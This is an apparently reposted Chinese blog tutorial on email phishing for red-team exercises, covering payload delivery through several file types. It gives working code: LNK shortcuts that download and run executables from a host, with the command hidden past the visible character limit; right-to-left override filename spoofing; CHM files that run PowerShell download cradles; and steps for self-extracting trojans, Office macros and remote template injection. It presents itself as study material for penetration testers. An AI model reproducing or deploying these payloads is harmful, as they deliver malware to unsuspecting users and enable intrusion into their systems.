首页 安全文摘 正文

干货 | 邮件钓鱼攻击学习

前言在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式,由于本人只是个安服仔,接触的比较少(但也不能不学),就有了这篇文章,参考各位大佬的姿势总结一下,顺便让好哥哥们复习一下基础。钓鱼手段Lnk(快捷方式)可以在“⽬标”栏写⼊⾃⼰的恶意命令,如powershell上线命令等,这里举例为CMD当我点击谷歌浏览器时,弹出了CMD可以进行更改图标快速

前言

在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式,由于本人只是个安服仔,接触的比较少(但也不能不学),就有了这篇文章,参考各位大佬的姿势总结一下,顺便让好哥哥们复习一下基础。

钓鱼手段

Lnk(快捷方式)

可以在“⽬标”栏写⼊⾃⼰的恶意命令,如powershell上线命令等,这里举例为CMD

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第1张

当我点击谷歌浏览器时,弹出了CMD

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第2张

可以进行更改图标

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第3张

快速生成lnk样本

$WshShell = New-Object \-comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("test.lnk")  
$Shortcut.TargetPath = "%SystemRoot%\\system32\\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\\System32\\Shell32.dll,21"  
$Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\\\\ascotbe.exe');&cmd /c .\\\\ascotbe.exe"  
$Shortcut.Save()

运行

powershell -ExecutionPolicy RemoteSigned -file test.ps1


干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第4张

Tips

目标文件位置所能显示最大字符串为260个,所有我们可以把执行的命令放在260个字符后面

$file = Get-Content ".\\test.txt"  
$WshShell = New-Object \-comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("test.lnk")  
$Shortcut.TargetPath = "%SystemRoot%\\system32\\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\\System32\\Shell32.dll,21"  
$Shortcut.Arguments = '                                                                                                                                                                                                                                      '\+ $file  
$Shortcut.Save()

文件后缀RTLO

他会让字符串倒着编码

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第5张

Python一键生成用,把txt改为png后缀

import os  
os.rename('test.txt', 'test-\\u202egnp.txt')
import os
os.rename('cmd.exe', u'no\\u202eFDP.exe')

CHM文档

创建一个文件夹(名字随意),在文件夹里面再创建两个文件夹(名字随意)和一个index.html文件,在两个文件夹内部创建各创建一个index.html文件。然后先将下列代码复制到根文件夹中的index.html中

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第6张

在index.html文件中编辑

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',calc.exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

使用cs生成修改模版中的calc.exe

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.100:81/a'))">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

使用EasyCHM编译

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第7张

原有模版CMD

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第8张

ps上线

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第9张

自解压

使用CS生成木马

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第10张

创建自解压文件

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第11张

高级自解压选项

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第12张

解压路径-绝对路径

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第13张

提取后运行

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第14张

静默模式

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第15张

更新模式

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第16张

修改文件名

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第17张

ResourceHacker

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第18张

打开flash安装文件导出资源

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第19张

替换资源文件

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第20张
干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第21张

上线

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第22张
干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第23张

office宏

本地加载

新建word,创建宏

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第24张

cs生成宏粘贴

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第25张

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第26张

保存为启用宏的文档

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第27张

打开文档上线

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第28张

远程加载

编写一个带有宏代码的DOTM文档,并启用一个http服务将DOTM放置于web下

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第29张
干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第30张

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第31张

新建一个任意的模版的docx文档并且解压

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第32张
干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第33张

编辑settings.xml.rels文件中的Target为我们第一个DOTM的http地址

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第34张

重新压缩改后缀名为.docx

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第35张

模拟点击上线

干货 | 邮件钓鱼攻击学习 钓鱼攻击 安全文摘 安全文摘  第36张

参考

https://www.ascotbe.com/2020/07/26/office_0x01/#LNK%E9%92%93%E9%B1%BC

https://paper.seebug.org/1329/

利用winrar自解压捆版Payload制作免杀钓鱼木马[1]

References

[1] 利用winrar自解压捆版payload制作免杀钓鱼木马: https://www.baikesec.com/webstudy/still/77.html



文章来源微信公众号:Chabug


海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/2011.html

相关推荐

从偶遇Flarum开始的RCE之旅

从偶遇Flarum开始的RCE之旅

前言在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式,由于本人只是个安服仔,接触的比较少(但也不能不学),就有了这篇文章...

WEB安全 3个月前 (08-21) 0 10032

2022年蓝队初级护网总结

2022年蓝队初级护网总结

前言在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式,由于本人只是个安服仔,接触的比较少(但也不能不学),就有了这篇文章...

安全文摘 3个月前 (08-21) 0 6666

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持